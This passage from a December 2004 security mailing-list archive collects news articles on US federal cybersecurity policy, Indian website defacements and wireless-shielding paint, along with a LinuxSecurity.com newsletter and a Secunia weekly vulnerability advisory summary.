Cybersecurity costs are expected to be factored into all agency budget requests. It's a matter the administration takes seriously enough that the Office of Management and Budget suggests agencies without adequate plans to improve cybersecurity shouldn't move to any new IT projects until cybersecurity is addressed, says Karen Evans, OMB's administrator for E-government and IT.

Entering his second term, President Bush faces a number of challenges to IT-related initiatives such as cybersecurity.
Perhaps the greatest challenge is a growing budget deficit projected to reach $521 billion for fiscal 2004. The president has promised to cut the deficit in half within five years, but much of this will depend on a reduction in spending, including a heavy reliance on IT to cut costs.

"This doesn't necessarily mean that IT budgets will be cut," Evans says. "If an agency is properly managing their portfolio, their IT budget might go down because they're achieving the same or better results with the same amount of tax dollars."

While OMB's expectation that each federal agency bake cybersecurity into its budget is a good start, the Cyber Security Industry Alliance is looking for the Bush administration to do more to get private industry to adopt such standards, since private industry owns and operates 90% of the United States' critical infrastructure. The alliance was launched in February by a group of technology providers including Computer Associates, Network Associates, and Symantec.

The Bush administration has laid out a good cybersecurity strategy, says Paul Kurtz, the alliance's executive director and former senior director of critical infrastructure protection for the White House's Homeland Security Council. In a paper published earlier this month, however, the alliance urged Bush in his second term to use his influence to follow through on his National Strategy to Secure Cyberspace, a February 2003 initiative that called for the formation of a national cyberspace response system, a cyberspace security threat- and vulnerability-reduction program, and a cyberspace security-awareness and -training program.

Kurtz acknowledges that the Department of Homeland Security has made some progress regarding cybersecurity, but he still would like to see responsibility for cybersecurity and physical security divided between two assistant secretaries. Robert Liscouski, Homeland Security assistant secretary for infrastructure protection, handles both.

"We don't have that senior-level focal point to work with both industry and government on cybersecurity matters," he says.

When Congress earlier this month passed a simplified version of its Intelligence Reform Act after cutting a provision that would have created a high-profile assistant secretary of cybersecurity within Homeland Security, advocates perceived this as a slight to cybersecurity's importance. "Often in this town, what really matters is the authority that comes with one's position," Kurtz says. "There's a lot that goes with such a position; it resonates on the Hill, creating accountability and someone the Hill can go to as a designated spokesman."

Evans says the formal creation of an assistant secretary for cybersecurity position is unnecessary. Any distinct cybersecurity position within Homeland Security is a management issue that should be worked out within the department, she says.

Both Evans and Kurtz agree, however, that the nation's data and IT infrastructure will only be protected through a partnership of government and industry. Such a partnership includes calling on private-sector companies to secure their systems, but also government's willingness to apply successful private-sector cybersecurity initiatives to its own systems, Evans says.

"This is not all on the government's shoulders," Kurtz agrees. "There needs to be a great action on the part of private industry." The Commerce Department should, for example, urge CEOs to review cybersecurity measures during board meeting reviews of business operations, he adds.

Setting aside the debate over the assistant secretary position, Kurtz is optimistic that cybersecurity will improve if the Senate ratifies the Council of Europe's Convention on Cybercrime and the Bush administration can encourage information-security governance in the private sector. Says Kurtz, "I'm confident that in a second term we'll see more action on these items."
From isn at c4i.org Wed Dec 29 01:32:15 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 29 01:51:35 2004
Subject: [ISN] Defacement Of Indian Websites On The Rise
Message-ID:

http://www.cxotoday.com/cxo/jsp/article.jsp?article_id=2513&cat_id=909

By CXOtoday Staff
Mumbai
Dec 24, 2004

The Indian Computer Emergency Response Team (CERT-In) has compiled a report [1] on how, with the global rise in cyber terrorism activity, Indian websites too have come under fire from attackers, some of them opportunists and others targeting specific sites and domains.

The report covers only defaced Indian websites under the .in ccTLD (Indian country code top-level domain). The data obtained for analysis dates from 1998 to 20 September 2004.

The .in ccTLD has 6430 registered domains in total, the majority of them .co.in domains. A total of 667 defacement records have been found under the .in ccTLD. The domain .co.in had 242 defacements, which is more than 36% of the total defacements.

According to the report, the number of .in ccTLD sites defaced was highest in the year 2001, when 219 sites were defaced. However, there has been an increase in the number of .gov.in sites being defaced every year. From only one site defaced in 1999, it increased to 43 in 2003. There is likely to be an increase in .gov.in sites defaced this year too, as 42 .gov.in sites have already been defaced this year, claims the report.

More than 150 hackers/hacker groups have been responsible for defacing Indian websites. The group AIC (Anti India Crew) has defaced the largest number of .in ccTLD sites, accounting for 15% of the total .in ccTLD sites defaced.

In terms of hosting platforms, Windows had the highest number of defacements (338) as compared to Linux at 179.

CERT-In has been set up by the government of India with the objective of promoting cyber security.
[1] http://www.cert-in.org.in/knowledgebase/whitepapers/analysis_defacewebsites.htm

From isn at c4i.org Wed Dec 29 01:32:39 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 29 01:51:37 2004
Subject: [ISN] Linux Security Week - December 27th 2004
Message-ID:

+---------------------------------------------------------------------+
|  LinuxSecurity.com                            Weekly Newsletter     |
|  December 27th, 2004                          Volume 5, Number 51n  |
|                                                                     |
|  Editorial Team:  Dave Wreski             dave@linuxsecurity.com    |
|                   Benjamin D. Thomas      ben@linuxsecurity.com     |
+---------------------------------------------------------------------+

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines.

This week, perhaps the most interesting articles include "Survivor's Guide to 2005: Security," "Security Starts from the Inside Out," and "Linux lasting longer against Net attacks."

---

>> Internet Productivity Suite: Open Source Security <<

Trust Internet Productivity Suite's open source architecture to give you the best security and productivity applications available. Collaborating with thousands of developers, Guardian Digital security engineers implement the most technologically advanced ideas and methods into their design.

http://store.guardiandigital.com/html/eng/products/software/ips_overview.shtml

---

LINUX ADVISORY WATCH

Happy Holidays! This week, advisories were released for cscope, htget, a2ps, ethereal, xzgv, debmake, xcdroast, udev, cups, postgresql, namazu, pam, samba, glibc, krb5, php, gnumeric, abiword, libtiff, kfax, abcm2ps, phpMyAdmin, WordPress, NASM, mplayer, mpg123, wget, urpmi, aspell, krb5, logcheck, samba, Linux kernel, kerberos5, libxml, gd, XFree86, and nfs-utils. The distributors include Debian, Fedora, Gentoo, Mandrake, NetBSD, Trustix, Red Hat, and SuSE.

http://www.linuxsecurity.com/content/view/117656/65/

-------------------------------------------------------------------

State of Linux Security 2004

In 2004, security continued to be a major concern. The beginning of the year was plagued with several kernel flaws and Linux vendor advisories continue to be released at an ever-increasing rate. This year, we have seen the reports touting Windows' security superiority, only to be debunked by other security experts immediately after release. Also, Guardian Digital launched the new LinuxSecurity.com, users continue to be targeted by automated attacks, and the need for security awareness and education continues to rise.

http://www.linuxsecurity.com/content/view/117655/49/

-----

Vincenzo Ciaglia Speaks Security 2004

Vincenzo Ciaglia of Linux Netwosix talks about this year of Linux Security. A full immersion in the world of Linux Security from many sides and points of view.

http://www.linuxsecurity.com/content/view/117515/49/

-----

Open Letter to the Linux Security Community

With an all new look & feel, organizational changes, security events, and additions to our staff, we hope to better serve the Linux and open source community. Although there are many aesthetic improvements, a major part of our development has focused on creating a content structure and backend system that is easy to update.

http://www.linuxsecurity.com/content/view/117288/49/

------

>> The Perfect Productivity Tools <<

WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set up comprehensive address books to consistently keep employees organized and connected.

http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05

--> Take advantage of the LinuxSecurity.com Quick Reference Card!
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf

+---------------------+
| Host Security News: | <<-----[ Articles This Week ]----------
+---------------------+

* The Linux Year
  24th, December, 2004

Was it because the march on the server space continued at a relentless pace? Because there were big announcements around desktop installments? Because there was finally some realistic perspective about the threat from SCO, or the threat to Microsoft? However you look at it, the penguin's tux has never looked more pristine or ready for business.

http://www.linuxsecurity.com/content/view/117669

* Adding strong security from day one
  22nd, December, 2004

Adding security to constrained devices is not an easy task for developers who need to accommodate a range of new features without compromising usability. Experience has shown that building security in at the design stage yields better results from a security and performance perspective.

http://www.linuxsecurity.com/content/view/117637

* LDAP Server Administration with GOsa
  20th, December, 2004

A flaw in two popular Unix and Linux administration consoles could lead to systems being compromised, according to an alert from security firm Secunia. The bug in Usermin, a widely used administration console for Unix and Linux, could allow the introduction of rogue shell code when a user views a particular e-mail via the web.

http://www.linuxsecurity.com/content/view/117585

* Special Report: Database Security
  24th, December, 2004

Databases control most of the business world's valuable information. Pick a vital application--credit-card processing, EDI, financial analysis, just-in-time production--and you'll find a database under it.

http://www.linuxsecurity.com/content/view/117663

* Tools Block Code-Busting Crooks
  20th, December, 2004

The concept of adding security to the coding phase of application development is catching on, with new companies delivering tools to help developers test for vulnerabilities early in the process.

http://www.linuxsecurity.com/content/view/117600

* Why Your Data Is At Risk
  21st, December, 2004

Your data is vulnerable no matter where it resides. While most companies take security precautions, many of those precautions turn out to be insufficient to protect valuable corporate assets. The key lies in knowing where vulnerabilities exist and making appropriate risk-based decisions.

http://www.linuxsecurity.com/content/view/117613

* Security Starts from the Inside Out
  21st, December, 2004

Patrick Angle, 34, was charged with intentionally damaging a protected computer. The charge alleged that Angle, who had worked for Varian, had become disgruntled with his employment by September 2003 and had been told by the company that his employment contract would be terminated in October of that same year.

http://www.linuxsecurity.com/content/view/117615

* How ITIL Can Improve Information Security
  24th, December, 2004

ITIL - the Information Technology Infrastructure Library - is a set of best practices and guidelines that define an integrated, process-based approach for managing information technology services. ITIL can be applied across almost every type of IT environment.

http://www.linuxsecurity.com/content/view/117666

* Linux in Government: Security Enhanced Linux - The Future is Now
  20th, December, 2004

If a must-have, must-know innovation exists for Linux's future viability, you might place all bets on Security Enhanced Linux. Vastly misunderstood and underrated, SELinux provides a marketing differentiator that could carry Linux deep into infrastructures that so far have shown lukewarm acceptance of the open-source operating system.
http://www.linuxsecurity.com/content/view/117586

+------------------------+
| Network Security News: |
+------------------------+

* Survivor's Guide to 2005: Security
  20th, December, 2004

Intrusion detection systems--the primary source of warnings that attacks are under way--are critical pieces of network-security infrastructure, providing detailed records of attacks, intrusions and unexpected network activity. For most enterprises, the IDS has become the central piece of security hardware, certainly the most visible piece to the staff. Without an IDS, the security staff must gather forensics information from firewall, server and router log files.

http://www.linuxsecurity.com/content/view/117587

* Linux lasting longer against Net attacks
  24th, December, 2004

Unpatched Linux systems are surviving longer on the Internet before being compromised, according to a report from the Honeynet Project released this week. The data, from a dozen networks, showed that the average Linux system lasts three months before being compromised, a significant increase from the 72-hour life span of a Linux system in 2001.

http://www.linuxsecurity.com/content/view/117668

* Will 2005 Bring a Safer Internet?
  24th, December, 2004

Sometimes writing about security is just too easy. Making predictions about next year is like this in some ways. Let's pick some of the low-hanging fruit early. Even though most spam-tracking companies show that spam already comprises 75 percent or more of all e-mail, that proportion will go up in 2005.

http://www.linuxsecurity.com/content/view/117671

* Linux holds out against attackers
  24th, December, 2004

A recent 'honeynet' experiment showed that unpatched Linux systems held up for an average of three months before succumbing to Internet-based attacks.

http://www.linuxsecurity.com/content/view/117662

* Know Your Enemy: Trends
  22nd, December, 2004

This paper documents how the life expectancy of unpatched or vulnerable deployments of common Linux systems has increased from 3 days to 3 months. This is surprising based on the increase of malicious activity seen in the past 18 months.

http://www.linuxsecurity.com/content/view/117617

+------------------------+
| General Security News: |
+------------------------+

* GPL to get a makeover
  23rd, December, 2004

The General Public License hasn't had a proper update for 13 years, and it's starting to show its age. It looks set to be updated though, to ensure it's more in tune with today's software models and potential legal battles.

http://www.linuxsecurity.com/content/view/117654

* NASA hacker jailed for six months
  20th, December, 2004

A US man has been jailed for six months for a 2001 attack on the web systems of space agency NASA which cost $200,000 to fix.

http://www.linuxsecurity.com/content/view/117588

* Groups fight Internet wiretap push
  24th, December, 2004

Companies and advocacy groups opposed to the FBI's plan to make the Internet more accommodating to covert law enforcement surveillance are sharpening a new argument against the controversial proposal: that law enforcement's Internet spying capabilities are just fine as they are.

http://www.linuxsecurity.com/content/view/117665

* Army focuses on cyber protection
  24th, December, 2004

A recently issued Army white paper, "Fight the Network," provides a new framework for the Signal Regiment, the service's communications organization, as it changes to support lighter, more mobile warfighting units.

http://www.linuxsecurity.com/content/view/117670

* Banks test ID device for online security
  24th, December, 2004

For years, banks gave away toasters to people who opened checking accounts; soon they may be distributing a more modern kind of appliance.
Responding to an increase in Internet fraud, some banks and brokerage firms plan to begin issuing small devices that would help their customers prove their identities when they log on to online banking, brokerage and bill-payment programs.

http://www.linuxsecurity.com/content/view/117673

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc.                LinuxSecurity.com

     To unsubscribe email newsletter-request@linuxsecurity.com
         with "unsubscribe" in the subject of the message.
------------------------------------------------------------------------

From isn at c4i.org Wed Dec 29 01:38:08 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 29 01:51:39 2004
Subject: [ISN] Holiday Break!
Message-ID:

If you haven't noticed, I've been taking a little break from sending out InfoSec News. I figured with ALL the vacation bouncebacks with everyone on holiday break, I should take a little one too. :)

I might post one more batch before the end of the year, but at least for those of you working the New Years watch, you'll have a little something to read before Regis drops the ball.

Cheers!

William Knowles
wk@c4i.org

*==============================================================*
"Communications without intelligence is noise;  Intelligence
without communications is irrelevant." Gen Alfred. M. Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Fri Dec 31 05:28:36 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 31 05:44:21 2004
Subject: [ISN] Startup Markets Wireless - Security Paint
Message-ID:

http://informationweek.com/story/showArticle.jhtml?articleID=56200676

By Jim Nash
Dec. 28, 2004

A small startup in Silicon Valley has an anti-intrusion tool that sells for $69 a gallon--you supply the brush.
Force Field Wireless makes three products that it says can dramatically reduce the leakage of wireless signals from a room or building. The company's sales manager, Harold Wray, co-developed DefendAir Radio Shield latex paint, which contains copper filings and an aluminum compound. When spread evenly on a wall, the paint reflects signals in frequencies from 100 MHz to 5 GHz. Paint four walls, a floor, and a ceiling, and you effectively have a Faraday cage, which is a specially constructed metal room that blocks all radio signals in or out, suitable for a CIA director or a determined shut-in.

"It was my concept along with my colleague, Diane Lopez," says Wray, a former network engineer with Network Associates. "We knew of people inundated with interference on their wireless systems. In fact, Diane, in her apartment, could find eight wireless networks around her. She needed to shield herself."

Pete Lindstrom, research director at Spire Security, says the idea is intriguing. It's for people who have a "mid- to high level of comfort with wireless," Lindstrom says. "The really security conscious are going to ban wireless altogether."

DefendAir is nontoxic, contains no lead, and meets all U.S. Environmental Protection Agency standards, Wray says. Besides the paint, Force Field sells 32 ounces of a copper/aluminum powder that homeowners can add to their own paint for $34. The company also makes a window film that cuts down on signal leakage: A 30-inch-by-25-foot roll is priced at $45.

"This wouldn't be the first thing I'd do to secure a network," says Spire Security's Lindstrom. "But in a crowded environment, in an office complex, it might be a thing to do." It's better to implement a solid authentication/encryption system, he says.

Force Field's Wray says sales are going well. A paint manufacturer delivers 100 gallons once every two months or so, and the paint was sold out last quarter.

Businesses make up the bulk of Force Field's customers, but Wray is pushing hard to win over consumers and looking at government sales, too. "Businesses--particularly commercial real-estate developers--see an immediate need for it," he says.

Indeed, 71% of those responding to InformationWeek Research's Outlook report for the fourth quarter of '04 say they plan to implement network-security-management apps. Sixty percent say they plan to deploy intrusion-detection software, and 42% plan to fire up wireless IP-based apps.

"Consider [radio-frequency identification], where not only are we talking about wireless networking but the whole value of RFID is the message emanating from the tags," says Lindstrom. DefendAir would be an attractive option to protect an RFID-enabled warehouse, he says.

There are drawbacks to the paint. It doesn't just block wireless networks. In the home, it would block the one or two remaining TVs connected to rabbit ears. More important, it blocks mobile-phone signals. Wray suggests that businesses either paint only critical parts of buildings or introduce wireless callers to the smokers huddled around the front door.

Convincing consumers to take wireless security seriously has been harder. "They see it like tinfoil on your head," Wray says. "They think it's kind of paranoid."

Force Field has been trying to interest the Department of Homeland Security, but discussions are ongoing, Wray says. "Ironically, we have had foreign governments contact us--from the Middle East. Kind of scary." Wray says he won't sell to them.
From isn at c4i.org Fri Dec 31 05:29:26 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 31 05:44:24 2004
Subject: [ISN] Secunia Weekly Summary - Issue: 2004-53
Message-ID:

========================================================================

                  The Secunia Weekly Advisory Summary
                        2004-12-23 - 2004-12-30

                       This week : 43 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

Monitor, Filter, and Manage Security Information
- Filtering and Management of Secunia advisories
- Overview, documentation, and detailed reports
- Alerting via email and SMS

Request Trial:
https://ca.secunia.com/?f=s

========================================================================
2) This Week in Brief:

ADVISORIES:

Almost every single branch of the Microsoft Windows operating system is vulnerable to several new vulnerabilities.

The vulnerabilities can be exploited to either cause a denial of service or compromise a vulnerable system.

Currently, no vendor solution is available for these vulnerabilities. Please read the referenced Secunia advisory for details.

References:
http://secunia.com/SA13645/

--

A vulnerability has been reported in SHOUTcast, which potentially can be exploited by malicious people to compromise a vulnerable system.

The vendor has released an updated version, which corrects this vulnerability.

References:
http://secunia.com/SA13661/

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.
========================================================================
3) This Week's Top Ten Most Read Advisories:

1.  [SA13482] Internet Explorer DHTML Edit ActiveX Control Cross-Site Scripting
2.  [SA13645] Microsoft Windows Multiple Vulnerabilities
3.  [SA12889] Microsoft Internet Explorer Multiple Vulnerabilities
4.  [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability
5.  [SA13239] phpBB Multiple Vulnerabilities
6.  [SA13251] Microsoft Internet Explorer Window Injection Vulnerability
7.  [SA13481] PHP Multiple Vulnerabilities
8.  [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability
9.  [SA13578] Windows Media Player ActiveX Control Two Vulnerabilities
10. [SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA13647] WPKontakt Email Script Insertion Vulnerability

UNIX/Linux:
[SA13692] Mandrake update for koffice
[SA13691] Mandrake update for kdegraphics
[SA13689] Mandrake update for gpdf
[SA13686] Mandrake update for tetex
[SA13685] Mandrake update for xpdf
[SA13667] Debian update for imlib
[SA13666] Debian update for tiff
[SA13663] Debian update for netkit-telnet-ssl
[SA13656] SSLtelnet Unspecified Format String Vulnerability
[SA13646] Fedora update for xpdf
[SA13690] Mandrake update for cups
[SA13683] Gentoo update for ViewCVS
[SA13669] Fedora update for cups
[SA13668] CUPS xpdf "doImage()" Buffer Overflow Vulnerability
[SA13664] Snort TCP/IP Options Denial of Service Vulnerability
[SA13658] Red Hat update for SquirrelMail
[SA13672] Gentoo update for cups
[SA13662] Mandrake update for samba
[SA13653] Netscape Directory Server for HP-UX Buffer Overflow Vulnerability
[SA13696] KDE kio_ftp FTP Command Injection Vulnerability
[SA13688] Mandrake update for kdelibs
[SA13651] HP Secure Web Server Denial of Service Vulnerability
[SA13648] HP Tru64 TCP Connection Reset Denial of Service
[SA13659] Red Hat update for kernel
[SA13684] Mandrake update for glibc
[SA13682] Conectiva update for netpbm
[SA13679] aStats Insecure Temporary File Creation
[SA13670] Atari800 Unspecified Buffer Overflow Vulnerabilities
[SA13655] HP-UX SAM Privilege Escalation Vulnerability
[SA13654] Linux Kernel SACF Instruction Privilege Escalation Vulnerability
[SA13650] Linux Security Modules Running Processes Capability Security Issue

Other:
[SA13671] Symantec Nexland Firewall Appliances Three Vulnerabilities

Cross Platform:
[SA13687] Mozilla "MSG_UnEscapeSearchUrl()" Buffer Overflow Vulnerability
[SA13673] WHM AutoPilot Multiple Vulnerabilities
[SA13661] SHOUTcast Filename Format String Vulnerability
[SA13660] PHProjekt "path_pre" Parameter Arbitrary File Inclusion Vulnerability
[SA13657] e107 Image Manager File Upload Vulnerability
[SA13652] Help Center Live Multiple Vulnerabilities
[SA13649] Zeroboard Two Vulnerabilities
[SA13677] MySQL Eventum Multiple Vulnerabilities
[SA13665] PHP-Blogger Disclosure of Sensitive Information Security Issue
[SA13694] Moodle "search" Cross-Site Scripting Vulnerability

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA13647] WPKontakt Email Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2004-12-24

A vulnerability has been reported in WPKontakt, allowing malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/13647/

UNIX/Linux:--

[SA13692] Mandrake update for koffice

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-30

MandrakeSoft has issued an update for koffice. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/13692/

--

[SA13691] Mandrake update for kdegraphics

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-30

MandrakeSoft has issued an update for kdegraphics. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13691/

--

[SA13689] Mandrake update for gpdf

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-30

MandrakeSoft has issued updates for gpdf. These fix a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13689/

--

[SA13686] Mandrake update for tetex

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-30

MandrakeSoft has issued an update for tetex. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13686/

--

[SA13685] Mandrake update for xpdf

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-30

MandrakeSoft has issued an update for xpdf. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13685/

--

[SA13667] Debian update for imlib

Critical:    Highly critical
Where:       From remote
Impact:      System access, DoS
Released:    2004-12-25

Debian has issued an update for imlib. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13667/

--

[SA13666] Debian update for tiff

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-25

Debian has issued an update for tiff. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13666/

--

[SA13663] Debian update for netkit-telnet-ssl

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-24

Debian has issued an update for netkit-telnet-ssl. This fixes a vulnerability, which potentially allows malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13663/

--

[SA13656] SSLtelnet Unspecified Format String Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-24

Joel Eriksson has reported a vulnerability in SSLtelnet, which potentially allows malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13656/

--

[SA13646] Fedora update for xpdf

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-25

Fedora has issued an update for xpdf. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13646/

--

[SA13690] Mandrake update for cups

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-30

MandrakeSoft has issued an update for cups. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13690/

--

[SA13683] Gentoo update for ViewCVS

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting
Released:    2004-12-29

Gentoo has issued an update for ViewCVS. This fixes two vulnerabilities, which can be exploited by malicious users to bypass certain security restrictions and conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/13683/

--

[SA13669] Fedora update for cups

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-26

Fedora has issued an update for cups.
This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13669/ -- [SA13668] CUPS xpdf "doImage()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-26 A vulnerability has been reported in CUPS, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13668/ -- [SA13664] Snort TCP/IP Options Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2004-12-24 Marcin Zgorecki has reported a vulnerability in Snort, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13664/ -- [SA13658] Red Hat update for SquirrelMail Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-24 Red Hat has issued an update for SquirrelMail. This fixes a vulnerability, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13658/ -- [SA13672] Gentoo update for cups Critical: Moderately critical Where: From local network Impact: Manipulation of data, DoS, System access Released: 2004-12-28 Gentoo has issued an update for cups. This fixes multiple vulnerabilities, which can be exploited by malicious users to manipulate certain files, cause a DoS (Denial of Service), or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13672/ -- [SA13662] Mandrake update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-28 MandrakeSoft has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/13662/ -- [SA13653] Netscape Directory Server for HP-UX Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-12-24 A vulnerability has been reported in Netscape Directory Server for HP-UX, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13653/ -- [SA13696] KDE kio_ftp FTP Command Injection Vulnerability Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2004-12-30 The vendor has acknowledged a vulnerability in kio_ftp, which can be exploited by malicious people to conduct FTP command injection attacks. Full Advisory: http://secunia.com/advisories/13696/ -- [SA13688] Mandrake update for kdelibs Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2004-12-30 MandrakeSoft has issued an update for kdelibs. This fixes a vulnerability, which can be exploited by malicious people to conduct FTP command injection attacks. Full Advisory: http://secunia.com/advisories/13688/ -- [SA13651] HP Secure Web Server Denial of Service Vulnerability Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-24 HP has acknowledged a vulnerability in Secure Web Server, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13651/ -- [SA13648] HP Tru64 TCP Connection Reset Denial of Service Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-24 HP has acknowledged a vulnerability in Tru64 UNIX, which can be exploited by malicious people to reset established TCP connections on a vulnerable system. 
Full Advisory: http://secunia.com/advisories/13648/ -- [SA13659] Red Hat update for kernel Critical: Less critical Where: From local network Impact: Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS Released: 2004-12-24 Red Hat has issued updated packages for the kernel. These fixes some vulnerabilities, allowing malicious, local users to escalate their privileges, cause a DoS (Denial of Service), and gain knowledge of sensitive information or malicious people to cause a DoS. Full Advisory: http://secunia.com/advisories/13659/ -- [SA13684] Mandrake update for glibc Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-30 MandrakeSoft has issued an update for glibc. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13684/ -- [SA13682] Conectiva update for netpbm Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-30 Conectiva has issued an update for netpbm. This fixes a vulnerability, which can be exploited by malicious, local users to escalate their privileges on a vulnerable system. Full Advisory: http://secunia.com/advisories/13682/ -- [SA13679] aStats Insecure Temporary File Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-29 Javier Fern?ndez-Sanguino Pe?a has reported a vulnerability in aStats, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. 
Full Advisory: http://secunia.com/advisories/13679/ -- [SA13670] Atari800 Unspecified Buffer Overflow Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-28 Some vulnerabilities have been reported in Atari800, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13670/ -- [SA13655] HP-UX SAM Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-24 A vulnerability has been reported in HP-UX, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13655/ -- [SA13654] Linux Kernel SACF Instruction Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-27 Martin Schwidefsky has reported a vulnerability in the Linux Kernel, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13654/ -- [SA13650] Linux Security Modules Running Processes Capability Security Issue Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-27 LiangBin has reported a security issue in Linux Security Modules (LSM), which may grant normal user processes escalated privileges. Full Advisory: http://secunia.com/advisories/13650/ Other:-- [SA13671] Symantec Nexland Firewall Appliances Three Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Manipulation of data, DoS Released: 2004-12-30 Symantec has acknowledged three vulnerabilities in the Nexland Firewall Appliances, which can be exploited by malicious people to cause a DoS (Denial of Service), identify active services, and manipulate the firewall configuration. 
